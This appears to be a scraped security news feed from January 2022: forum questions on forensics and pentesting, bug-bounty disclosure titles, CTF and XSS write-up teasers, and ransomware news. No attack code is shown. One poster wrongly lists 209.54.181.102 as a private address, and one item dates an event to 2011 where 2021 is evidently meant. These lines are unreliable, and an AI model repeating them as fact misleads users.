    While investigating a remote intrusion warning I noticed http traffic from two separate devices communicating with private IP subnet ranges that do not belong to any of our routers, or other devices. All of the traffic is to port 80. Example IPs include: 10.50.60.15 10.80.80.112 209.54.181.102 All the above are reserved private ranges and the aforementioned traffic was observed on two different routers, but using the same Verizon modem. Anyone seen this before, or can explain? There are no VPNs in use, or similar service. Log submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
    SQLite query repository?
    Does anyone know of any repositories (sites, blogs, etc) where people can post and look for SQLite queries? There are times when the best tools in the world can’t parse what you want and I thought it would be a great resource if there were queries others had done and shared cataloged somewhere. If you know of any, or any good sites, drop them below! submitted by /u/acw750 [link] [comments]  ( 1 min )
    Forensic script ideas?
    Hello all, I have no programming experience, I can use command line and get around in Linux but I would like to make practical things the community would find useful. There are so many good scripts and tools out there but what is a missing tool that you would like to have? I would like to build the script/program in Python, Go or C#. I am looking for some ideas that you think a beginner would be able to tackle that would have some value to others. submitted by /u/AgitatedSecurity [link] [comments]  ( 2 min )

    SecWiki News 2022-01-21 Review
    Automated penetration: an in-depth analysis of the DeepExploit framework by ourren. For more of the latest articles, visit SecWiki  ( 2 min )

    Simple CTF- TryHackme
    CTF Continue reading on System Weakness »  ( 2 min )
    Hashing the Favicon.ico
    Hey Folks, I am Ski Mask and I recently started bug bounty. In this write-up, I will tell you about one of my findings!! Continue reading on Medium »  ( 1 min )
    Multi XSS Exploit in Upload File
    Hello amazing hunters, Today I want to note 4 ways to find XSS in file upload that I found, all of them in bug bounty programs or pentest… Continue reading on System Weakness »  ( 2 min )
    Cronos Theft of Transactions Fees Bugfix Postmortem
    Transactions in blockchain are like sound traveling through air. We communicate with others through transactions; we announce what we’re… Continue reading on Immunefi »  ( 4 min )
    Nakji Network launches a 200K USD Bug Bounty Program
    Singapore, 21st January 2022 — The Nakji Foundation (‘Nakji’) is launching a 200K USD Bug Bounty program for developers and security… Continue reading on Sentinel Protocol »  ( 3 min )
    Top 10 web hacking techniques of 2021 — PortSwigger
    OK, I will gradually translate all the methods; you can view the original here: “‘Top 10 web hacking techniques of 2021 —… Continue reading on Medium »  ( 1 min )

    Thoughts on suitable commands for vulnerability detection
    You often need to send a request and observe the response, then judge from the response whether the command executed. So which command gives the best result?  ( 1 min )
    FreeBuf Morning Report | Bank Indonesia hit by ransomware attack, 13GB of data leaked; Twitter security team in upheaval as senior executives depart
    Peiter Zatko, head of Twitter's security department and the well-known hacker “Mudge”, has left the company. CISO Rinki Sethi will leave in the coming weeks.  ( 1 min )
    Cisco StarOS vulnerabilities may pose remote code execution and information disclosure risks
    Recently, Cisco announced it has patched a remote code execution vulnerability.
    FreeBuf Enterprise Security Private Meetup: Shanghai Finance Night held successfully
    On the afternoon of January 15, the first “Enterprise Security Private Meetup: Shanghai Finance Night”, organized by the Chinese cybersecurity industry portal FreeBuf, was held in Shanghai.
    FreeBuf Weekly | Well-known subtitle site Opensubtitles breached by hackers; China's first cybersecurity industry service short number launched
    We round up this week's hot news, quality articles and handy tools so you don't miss any of this week's highlights!  ( 1 min )
    ASRC 2021 Email Security Trends Review
    In the post-pandemic era, everyone is gradually adapting to remote work, and the deployment of information security equipment is no longer a hurried response to the security risks of remote work but an adaptive deployment of an entirely new kind  ( 1 min )
    2021 Annual Report on Targeted Ransomware Attack Activity
    Ransomware attacks are already one of the biggest threats to cybersecurity, having evolved from an early online nuisance into an escalating new global challenge that endangers the functioning of society, economic stability and public safety.  ( 1 min )
    Case closed: the REvil ransomware gang is caught
    On the 14th, Russian authorities announced arrests of the REvil ransomware group  ( 1 min )
    2021 cybersecurity regulation roundup: major regulations keep landing, data security welcomes new opportunities
    Overall, 2021 was a year of take-off for the digital economy, a year of comprehensive and in-depth development for cybersecurity, and above all a year of comprehensive and in-depth regulation in the data field.  ( 1 min )
    FreeBuf Enterprise Group Discussion | Let's talk about enterprise cybersecurity over the holidays
    With Spring Festival approaching, enterprise security faces no small test. As the last discussion topic before the new year, we'd like everyone to share how to safeguard enterprise cybersecurity during the holidays.  ( 1 min )
    2021 SCTF Flying-kernel challenge analysis
    This challenge can be solved by escalating privileges in several ways to obtain the flag. The solution in this article leans toward the Glibc style of exploitation, an arbitrary kernel address write; it is not the intended solution, but it gives rise to more exploitation ideas, and those interested can debug it themselves.  ( 3 min )
    FreeBuf Cybersecurity Chronicle | Summary of 2021 vulnerability exploitation incidents
    Let us look back and take stock of 30 vulnerability exploitation incidents in 2021 that affected the industry and even society as a whole.  ( 1 min )
    “Information Security Technology: Guide to Cybersecurity Service Cost Measurement” (draft for comment) released
    The Guide applies to activities such as cybersecurity service cost budgeting, project bidding, project final accounting and related contract preparation carried out by both suppliers and purchasers of cybersecurity services.

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )

    RedRabbit — Offensive PowerShell
    RedRabbit is the twin of BlueRabbit however, RedRabbit has more offensive scripts. RedRabbit was created to help conduct ethical… Continue reading on Medium »  ( 3 min )

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )

    Security vulnerability in Rust standard library
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30023615 Points: 64 # Comments: 37  ( 2 min )
    DNS Vulnerability, Configuration Errors That Can Cause DDoS
    Article URL: https://labs.ripe.net/author/giovane_moura/dns-vulnerability-configuration-errors-that-can-cause-ddos/ Comments URL: https://news.ycombinator.com/item?id=30021239 Points: 1 # Comments: 0  ( 7 min )

    Tons of software to Try and Buy :-)
    https://soft.uclv.edu.cu/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )

    Authz0 v1.1 Released 🎉
    Hi security engineers and hackers! Authz0 v1.1.0 has been released 🎉 First of all, I would like to thank many of you for your good feedback. Summary: Add setCred command; Add --include-zap flag in new command; Add --include-har flag in new command; Add --include-burp flag in new command; Add --assert-fail-size-margin flag in new command; Support multiple same assert type; Improve report; Fixed bugs. Credentials and setCred: Now, we can add credentials to the template using the setCred command.


    Invalid handling of X509_verify_cert() internal errors in libssl (CVE-2021-4044)
    Internet Bug Bounty disclosed a bug submitted by tniessen: https://hackerone.com/reports/1455411 - Bounty: $1200
    Reflected XSS online-store-git.shopifycloud.com
    Shopify disclosed a bug submitted by bepresent: https://hackerone.com/reports/1410459 - Bounty: $3500
    Direct Access To admin Dashboard
    Shopify disclosed a bug submitted by mester_x: https://hackerone.com/reports/1421804 - Bounty: $500
    Stored XSS at https://linkpop.com
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1441988 - Bounty: $1600
    Cross-site Scripting (XSS) - Stored on ads.tiktok.com in Text field
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376961 - Bounty: $999

    Does anyone know what "gaia_account_name" means specifically in the context of a Google Duo database table?
    I couldn't find much at all, but I feel like "gaia" has some connotation like mother/creator/origin, and thus "gaia_account_name" means the account name of the user that set up Google Duo on the device. Any progress toward certainty is greatly appreciated. submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 1 min )
    I hosted a webinar for HTCIA last week about providing effective expert witness testimony - here’s the recording!
    submitted by /u/Monolith_Pro [link] [comments]  ( 1 min )
    Effective imaging/cloning large disk
    Hi there. Is there a most effective way of imaging very large disks (over 2 terabytes)? The next challenge is when doing the automated analysis (I'm using Autopsy): is there a more effective (fastest) way to do this? I once analyzed a 1 TB disk using Autopsy and it took more than 1 week to complete (the computer specification: CPU i7 6th Gen, RAM 32GB, imaging results on SSD, and using type C connector). EDIT 1: Thank you for all of your feedback. I can't afford a TX1 or any licensed tool (hardware or software based) at the moment. Using an open source tool is preferred. However, I am also open to any licensed hardware or software suggestions. The only licensed hardware that I use is the WiebeTech write blocker. I'm using Autopsy for automated analysis (some ingest modules were used such as hashing, web artifacts, keyword search, and Plaso) and CAINE for manual analysis. submitted by /u/modpr0be [link] [comments]  ( 3 min )

    Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)
    So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out… Continue reading on Medium »
    Collecting parameters with BURP SUITE!
    The reconnaissance phase is the most important while we are analyzing a “target”, and parameter collection can change the course of your… Continue reading on Medium »  ( 2 min )
    Early bed bug stains on sheets
    Bedbugs are a real threat to your sleep quality. These small, oval, brown animals feed on our blood at night. If you wake up with… Continue reading on Medium »  ( 3 min )
    My First Blind XSS
    Disclaimer Continue reading on Medium »  ( 2 min )
    Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…
    Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting. Continue reading on Medium »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist(PART-2)
    Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the… Continue reading on Medium »  ( 2 min )
    XYZ of XSS
    Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would… Continue reading on Medium »  ( 4 min )
    PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB SOLUTIONS
    Authentication, one of the most important parts of web applications, is the process of verifying the identity of a specific user or client… Continue reading on Medium »  ( 17 min )
    How I Hacked into Pune University’s Exam/Teachers Portal
    Bypassing the Authentication mechanism results in an amazing Account takeover. Continue reading on Medium »  ( 4 min )
    Nakji Network’s 200K Bug Bounty Program
    The Nakji Foundation Continue reading on Medium »  ( 2 min )

    Big Tech advertiser friendliness and SEO garbage.
    This is potentially a bit off-topic for this sub, but hopefully well within scope for the users: Feels like search results are full of complete nonsense (I moved from google to qwant about a year ago, which was good at first, but now seems to be getting worse) and individual mainstream websites are constantly banning creators and removing content that's otherwise useful but potentially unfriendly to advertisers. This is just a loose feeling that the internet is getting worse every day; I'm wondering if there is any pushback against this and if it's possible to get an experience closer to 10-15 years ago when it didn't feel like a dystopian hellscape was rapidly approaching. Are corporate friendly walled gardens going to be the future of the internet? Is this going to be preferred when search engines lose the arms race against SEO spam? Is the sky actually falling? submitted by /u/TwinkyTheBear [link] [comments]  ( 1 min )
    Any love for Carbon Black EDR?
    CB Advanced is $30/device. SentinelOne Control is $31/device. CB gives me a process tree/timeline of the attack. S1 requires Complete to do that, about $60/device. I've been quoted $2,500 for VMware to help setup my policies so it's set and forget. I read a lot of hate on here about CB being too noisy. Also a decent amount of hate for S1. CrowdStrike seems to be the favorite but it's $70-80/device, so wanting CB or S1. Which one would you go with? 200 devices, so small environment. Upgrading from Webroot, so anything is better. submitted by /u/JeepMunkee [link] [comments]  ( 2 min )
    Which cloud IaS service for DDoS tests?
    Hello, we are a small pentesting firm and want to include (small-scale, short-term!) "DDoS" tests in our portfolio (only whitehat tests with full permission, simple stuff such as SYN floods, TLS flooding, slow loris). Our last cloud VPS vendor was ok with it at first, but withdrew their permission to use their boxes for any kind of DDoS testing after a number of successful tests. Maybe it was just a nervous employee - but it is a problem for us if we cannot fulfill our obligations to our customers if the cloud vendor suddenly cuts our service. => We are thus looking for a reliable and trustworthy cloud IaS (VPS) provider for small scale DDoS tests: Up to 100 virtual servers at a time (starting with 1, then adding servers until saturation is given or the target system passes the test without service reduction); API for instantiating/provisioning and starting/stopping the boxes, executing scripts; Reasonable network connection - but volumetric DDoS testing is only the smallest part of our test suite; Central to Eastern European area preferred; Only whitehat tests with full permission, reputable business; Only short bursts in the magnitude of minutes (until our monitor sensor recognizes service degradation in the target). Can you recommend cloud VPS vendors which are OK with such small-scale, short-term DDoS tests? Thank you very much! Dany submitted by /u/thrownetsecddos [link] [comments]  ( 1 min )
    What is this presumed phishing email trying to accomplish?
    The only thing I can think of is they are trying to get me to call the 888-number in the message. Simple Order is restaurant software, I don't work in a restaurant and they wouldn't have iPads. The address at the bottom in California is a house. There is no Durham in NY that I can find (the ship to). Paypal is clean. What am I missing? There are no links, no pictures or attachments I can find. I sanitized my name (which was correct) and my email address, everything else is from the original raw email. Please let me know if you need anything else to help figure out what's happening here. Thanks! Received: from 10.217.151.75 by atlas212.free.mail.ne1.yahoo.com with HTTPS; Thu, 20 Jan 2022 15:49:18 +0000 Return-Path: X-Originating-Ip: [209.85.166.178] Rec…  ( 5 min )
    Help with Masters Thesis :) Python RAT Malware Samples
    Hey everyone, I am currently in the process of completing my dissertation which involves creating my own python malware to test some free anti-virus solutions and software. For the dissertation/thesis I need to find some samples of RAT malware written in python to analyse. I have managed to find a couple but ideally I need a good website/resource that has a database of them. Any help would be great, many thanks! submitted by /u/DJ0x [link] [comments]  ( 2 min )
    Home network abused for brute force ssh attacks
    Hi, an interesting security incident occurred at my home and I would greatly appreciate advice on how to proceed. A few days ago, my HBO service was blocked on all my devices connected to my home WiFi (yet worked outside the network), which was quite interesting, and after a few calls to HBO support I finally got the information that they actively blocked my IP address due to malicious activity occurring from my IP that was reported in a public database. After some googling I found out that this must be https://www.abuseipdb.com/ where my IP address really was reported (38x) for categories: "Port Scan", "Hacking", "Brute force", "SSH". I checked the reports in detail and it seems that all attacks were done via SSH and they were trying to log into different websites using different user name…  ( 5 min )
    Where do you draw the line between legal and illegal?
    I've been a jr pentester for a few months and was wondering: right before you get the green light to pentest a web application and you have spare time at work and decide to gather some information, what is your approach? I can find some emails of the company and check with what tools the web app was built. But whenever I do subdomain scraping with amass or sublist3r or other frameworks the firewall is always signaling. I have absolutely no intention to do something illegal and get in trouble, neither for me nor the company. Where do you draw the line on which act is legal and illegal? I also want to get into bug bounty programs, but I am afraid because of the same reason. When doing so, do you use any proxies or other stuff? How do you basically stay safe (keep some anonymity) even for whitehat, when doing this job. submitted by /u/tryingtoworkatm [link] [comments]  ( 4 min )
    What's more lucrative: black hat or white hat hacking?
    submitted by /u/anon314159265358p [link] [comments]  ( 1 min )

    Using Go to Develop Offensive Tooling
    With better Security Tooling, that can easily detect Powershell and C# Offensive Tooling, Red Teamers have to adapt their offensive capabilities. Go is a statically linked programming language which can be easily cross-compiled and needs no installation dependencies. This makes it perfect for Red Teamers. This great talk describes how Golang can be used in an offensive way: https://youtu.be/AGLunpPtOgM submitted by /u/_R4bb1t_ [link] [comments]  ( 1 min )
    MoonBounce: the dark side of UEFI firmware
    submitted by /u/dmchell [link] [comments]

    Threat Brief: Ongoing Russia and Ukraine Cyber Conflict
    We analyze and suggest mitigations for CVE-2021-32648 and WhisperGate, two threats that have been targeting Ukrainian organizations. The post Threat Brief: Ongoing Russia and Ukraine Cyber Conflict appeared first on Unit42.

    Exnoscan
    Exnoscan is a simple bash script that can help you identify gaps. We often monitor what we know, so Exnoscan aims to identify what you… Continue reading on Medium »  ( 2 min )
    Cyber Detective OSINT CTF “Evidence Investigation” Writeup
    The Cyber Society at Cardiff University runs Cyber Detective CTF, a free OSINT CTF. Continue reading on Medium »  ( 7 min )
    Doing OSINT with Google LENS
    Today I bring you a new article, in which I decided to address a particular topic, taking advantage of one of my greatest… Continue reading on Medium »  ( 4 min )
    GEOINT and SOCMINT in Investigation
    A few days ago I read an article by Mr. Diaz Caneja, in which the author highlights very well the scope of social media intelligence and the… Continue reading on Medium »  ( 3 min )
    The new paradigms of Investigation: CRIMINT and Social media analytics in the face of digitalization
    To begin talking about these new paradigms, we must first understand these terminologies in order to make our… more pleasant… Continue reading on Medium »  ( 4 min )
    “YOU”, a series that shows us the vulnerability of our information on Social Networks
    Netflix has launched a new series that lets us see the importance of our data; in this story a young man becomes obsessed with a woman and… Continue reading on Medium »  ( 3 min )
    Quiztime — Random OSINT Challenge 4
    On Jan 7, 2022, Quiztime (contributor @fiete_stegers) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 3
    On Jan 5, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was, weird :). We had to figure out what was… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 2
    On Jan 1, 2022, a regular Quiztime and contributor @bayer_julia shared a new OSINT quiz with us. The objective was, simple. We had to… Continue reading on Medium »  ( 2 min )
    Quiztime — Random OSINT Challenge 1
    On December 29, 2021, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was, for me at least, not very simple… Continue reading on Medium »  ( 2 min )

    A Detailed Analysis of WhisperGate Targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Pentest Collaboration Framework: tool which will help you to store/modify/share information about pentest/web analysis projects. OpenSource, Portable, CrossPlatform & completely free! Supports integration with 15 tools & user-defined report generation. For several teams: separated workspaces!
    submitted by /u/Any_Gas_6250 [link] [comments]  ( 1 min )
    HOUDINI: A web app with huge number of Docker Images for Network Security with run commands and cheatsheet (Hundreds of Offensive and Useful Docker Images for Network Intrusion )
    submitted by /u/deleee [link] [comments]  ( 1 min )
    How mail server related DNS settings (SPF, DKIM, DMARC, MTA-STS, DANE, BIMI) work and their usage stats in the top 1M domain
    submitted by /u/c0r0n3r [link] [comments]  ( 1 min )
    First Morello prototype architecture silicon (memory safety at a hardware level)
    submitted by /u/unaligned_access [link] [comments]  ( 3 min )
    SMBSR made it through another lockdown with some new interesting skills (and fixes). Go check out and judge it (respectfully)
    submitted by /u/oldboy21 [link] [comments]  ( 1 min )
    OctopusWAF is an open-source web application firewall made in C language and uses libevent resources.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )

    SecWiki News 2022-01-20 Review
    A brief analysis of modern enterprise cybersecurity architecture by ourren. For more of the latest articles, visit SecWiki  ( 2 min )

    WMI for Script Kiddies
    Introduction Let’s say an ‘Administrator’ lands on a target network host and wants to look around and ‘administer’ the system without uploading any new tools… How can I do that without burning any of my Script Kiddie tools? WMI or Windows Management Instrumentation or Windows Managed Infrastructure is an interface for managed components that provides... The post WMI for Script Kiddies appeared first on TrustedSec.  ( 12 min )

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, a Vulnhub medium machine, was created by Elias Sousa and can be downloaded here. This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.

    Rust – Security advisory for the standard library (CVE-2022-21658)
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html | Comments URL: https://news.ycombinator.com/item?id=30007470 | Points: 10 | Comments: 0

    Attackers use adult games as bait to spread malware via cloud drives
    Security researchers recently found DDoS IRC Bot malware samples disguised as adult games being distributed through cloud storage services.
    Attackers begin using XLL files in attacks
    Researchers have recently observed an increase in campaigns that launch attacks using malicious Microsoft Excel add-in (XLL) files.
    The cybersecurity sandbox market will reach 43 billion USD by 2027
    China's cybersecurity sandbox market is expected to reach 6.9 billion USD by 2027.
    "Information security technology: Basic requirements for the competence of cybersecurity practitioners" (draft for comment) released
    The Basic Requirements define the classification of cybersecurity practitioners and the knowledge and skill requirements for each category, and apply to the selection, training, evaluation and management of cybersecurity practitioners by all kinds of organizations.
    Marketing giant RRD admits data was stolen in Conti ransomware attack
    US marketing giant RR Donnelly (RRD) recently disclosed that data was stolen from the company in a December cyberattack. BleepingComputer later confirmed that it was a Conti ransomware attack. RRD is a leading integrated services company that provides communications, commercial printing and marketing services to enterprise customers. The company has more than 33,000 employees at over 200 locations worldwide, and its 2021 revenue was 4.93 billion USD. On December 27, 2011, RRD filed with the US Securities and Exchange Commission (SEC)
    Nine departments jointly issue "Several Opinions on Promoting the Standardized, Healthy and Sustainable Development of the Platform Economy"
    The Opinions put forward nineteen measures covering improving rules and systems, raising regulatory capacity and standards, optimizing the development environment, strengthening innovation capacity, empowering economic transformation, and safeguard measures.
    International Committee of the Red Cross hit by cyberattack; data of more than 515,000 people leaked
    The ICRC disclosed that a cyberattack on its data contractor leaked information from its "family reunification" program, with the personal data of more than 515,000 people stolen.
    FreeBuf Morning Report | US agents use WhatsApp to monitor Chinese phones; China's first cybersecurity industry service short number goes live
    According to government surveillance records just unsealed on application in Ohio, in November 2021 investigators from the US Drug Enforcement Administration asked WhatsApp to track 7 users located in China.
    CACTER Email Security and 中睿天下 release 2021 Q4 enterprise email security report: phishing emails doubled, 85% from overseas!
    CACTER Email Security and 中睿天下 jointly release an email security report! Phishing emails doubled year on year! 85% of them come from overseas? With the year end approaching, raising defenses cannot wait.
    Design and application of an IoT security platform based on the SM9 commercial cryptographic algorithm
    How to secure the Internet of Things has become a difficult problem facing government regulators and enterprises of all kinds. Rolling out a complete, scientific and standardized IoT security platform is therefore an urgent priority.
    What does a 90-point data center look like? (Part 1)
    Continuing from the previous article, "What does a 90-point data center look like? (Part 1)", this installment covers the other three evaluation criteria for data center equipment.
    任子行 video network solution, focused on protecting video surveillance data!
    Netizens have reported that accounts can still be found on Bilibili that appear to specialize in cracking and uploading surveillance video from schools, hospitals and other public places, and that through these accounts one can view multiple uploaded surveillance clips of teachers lecturing, hospital nurse stations and hotel front desks.
    Dissecting ROP chain construction with NX enabled
    When learning pwn, we usually run into cases where NX is enabled, meaning the stack is non-executable. In that situation we have to use leftover content on the stack, or functions such as init, to construct a ROP chain and then write an exploit to get a shell.
    Marketing giant's data stolen, International Red Cross hit by cyberattack | January 20 global cybersecurity hotspots
    FBI warning: scammers are using fake QR codes to steal your passwords and money.
    Phishers impersonate the US Department of Labor to steal users' Office 365 accounts
    The phishing campaign has been running for at least several months; the senders pose as senior DoL staff and invite recipients to submit bids for ongoing government projects.
    FreeBuf Cybersecurity Chronicle | Summary of domestic cybersecurity incidents in 2021
    The domestic network environment has remained in "dire straits"; the trend toward confrontation in cyberspace is increasingly evident, and the frequency of cyberattacks from other countries keeps rising.

    Honeypot Discussions Part-3
    In this article, we will end the honeypot trilogy. If you haven’t read Part-1 and Part-2 yet, you may take a look at them first. Or we can… Continue reading on Medium »

    How Stack Overflow users responded to Log4Shell, the Log4j vulnerability
    Article URL: https://stackoverflow.blog/2022/01/19/heres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone/ | Comments URL: https://news.ycombinator.com/item?id=30003308 | Points: 2 | Comments: 0

    wildlife photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME


    Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike
    submitted by /u/dmchell
    Kraken the Code on Prometheus
    submitted by /u/dmchell
    PerSwaysion Threat Actor Updates Their Techniques and Infrastructure
    submitted by /u/dmchell
    The OAuth Misconfiguration
    submitted by /u/banginpadr

    Xelu's FREE Controller Prompts | Visual prompts for every mainstream controller's inputs
    submitted by /u/PCubiles
    A large folder of Charles Manson audio recordings
    http://109.120.203.163/Music/BLUES%20and%20country/Charles%20Manson/ Go upwards for more. If anyone finds any steel lap guitar resources, send them my way. I've decided to focus on music and living a simple life, something my life the last few years hasn't been. I changed countries, moved to the country and took a job in nursing (until I convince my friend Andy to let me session/tour with his band). submitted by /u/inoculatemedia
    D&D stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391724 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391725 - Bounty: $450
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391726 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391727 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391728 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391729 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391771 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391772 - Bounty: $450
    [GO]: [CWE-090: LDAP Injection All For One]
    GitHub Security Lab disclosed a bug submitted by pupiles: https://hackerone.com/reports/1397942 - Bounty: $1800
    [Python]: CWE-079: HTTP Header injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1401159 - Bounty: $1800
    [Python]: JWT security-related queries
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1403263 - Bounty: $1800
    ihsinme: CPP Add query for CWE-675 Duplicate Operations on Resource
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1413540 - Bounty: $1000
    [porcupiney.hairs]: [Python] Add Flask Path injection sinks
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1413541 - Bounty: $1800
    [Java] CWE-400: Query to detect uncontrolled thread resource consumption
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1413542 - Bounty: $1800
    Java: Regex injection
    GitHub Security Lab disclosed a bug submitted by edvraa: https://hackerone.com/reports/1443028 - Bounty: $1000
    [Javascript]: [Clipboard-based XSS]
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1448236
    [Java] CWE-089: MyBatis Mapper XML SQL Injection
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1442954 - Bounty: $4500
    [Java] CWE-552: Query to detect unsafe request dispatcher usage
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1454582 - Bounty: $1800
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1438393
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1423496
    Reflected XSS on https:///via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029243
    Reflected XSS in https:// via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029238
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223577
    Wrong settings in ADF Faces leads to information disclosure
    U.S. Dept Of Defense disclosed a bug submitted by h3xr: https://hackerone.com/reports/1422641
    User can pay using archived price by manipulating the request sent to `POST /v1/payment_pages/for_plink`
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1328278 - Bounty: $1000
    Dom Xss vulnerability
    Recorded Future disclosed a bug submitted by fornex: https://hackerone.com/reports/1448616
    Exposed Golang debugger on tier3.riot.mail.ru:9090, 9080
    Mail.ru disclosed a bug submitted by ian: https://hackerone.com/reports/1247910

    Are you Looking for a team? Looking to collaborate with other hackers?
    We are looking for more members to join our team to collaborate on Projects, HackTheBox, CTFs & Bug Bounties. Our Members have found Vulnerabilities in the US Dept of Defense, Verizon Media, Yahoo & More on the HackerOne platform. We also have members that have been in the HTB Top 10 & 1st in the UK. You don't have to be the best; we are willing to help and teach members who may not be on our skill level, so please sign up if you're interested. We are trying to create a non-toxic environment in which hackers can collaborate without any drama. Please fill out our form and we will be in contact! Link to form: https://forms.gle/CDzVBLynAL9ftwK38 submitted by /u/Far-Piece-7371

    PCAP Analysis
    Hi there. I am just starting to learn about PCAP analysis/forensics. I am experienced in Windows OS forensics and never really worked with PCAPs before. What are some of the tools everyone uses besides Wireshark? I've been reading up on Zeek. submitted by /u/antmar9041
    Tails Memory Forensics
    I was curious if anyone knows of any articles that cover this topic. A quick Google search hasn’t borne anything useful. Preferably a professional paper. submitted by /u/strollingginger
    Degree decision
    Is CS or CE better for cyber forensics? submitted by /u/swatteam23

    From MVP to ISO27001/SOC 2
    Hi Everyone, I just joined this community and would like to reach out with a question. I am a co-founder of an early-stage tech startup (SaaS) where we're about to reach our second product milestone soon: MVP. Our first commercial release ("Minimum Marketable Product") should happen around September 2022. We are about ten people, half of them developers. Everything is in the cloud. We have a Chief Architect who is a very mature professional. I don't have an IT background, but as we'd like to work with enterprises and other security-minded organizations, I am considering obtaining certification for standards like ISO27001 and/or SOC 2 (Type I and II). Is it a reasonable ambition to start this process as soon as our MVP is out (next month), or is it more realistic to wait until our product and team gain more maturity? If we have to pick, e.g. due to budget constraints, would you recommend pursuing ISO27001 or SOC 2? tl;dr: For a very young startup, what is the best time to start working on compliance and certifications? Thank you! submitted by /u/brunotoronto
    Trend Micro Apex One vs Deep Security/Cloud One
    Hi all, is Apex One good for both Servers and Endpoints? Or do we need to suggest Deep Security? If it is not good for Servers, why so? I know they are both products of Trend Micro, but I am not able to find understandable differences between them; I need to know the difference between them for a project. Any kind of information or help on this would be nice, thank you. submitted by /u/aaronthecoolgnome
    Hacking books (Python) for intermediate programmers
    Some good Python books for people who don't know anything about hacking but are intermediate programmers. I've read the book: Starting Out with Python, 5th Edition, ISBN 9780135929032. submitted by /u/SufficientResident59
    Why do hackers like using reverse proxies?
    submitted by /u/baghdadcafe
    Why do people put dots at the end of everything they send in work messages?
    Okay, I know this may not be the right Reddit sub for this question, but I figured in IT most of us deal with Teams or some sort of messaging. I know this also is kind of a weird thing to make a post about, but it just is something I don't understand and genuinely want to. Whenever I message people at work or they message me, they always leave dots at the end of a lot of the things they are saying. I have gotten dozens of messages saying "Hello...". It is not a typo either; there is no way it could be. It reminds me of when someone texts you something and adds it for dramatic effect, but it will literally be messages like the one above saying hello or just "Sure...". It's just kind of odd to me, but I was just wondering if anyone knew why. Edit: Grammar & Thanks for the Informative Responses! submitted by /u/winningrove
    Resources for Compensation
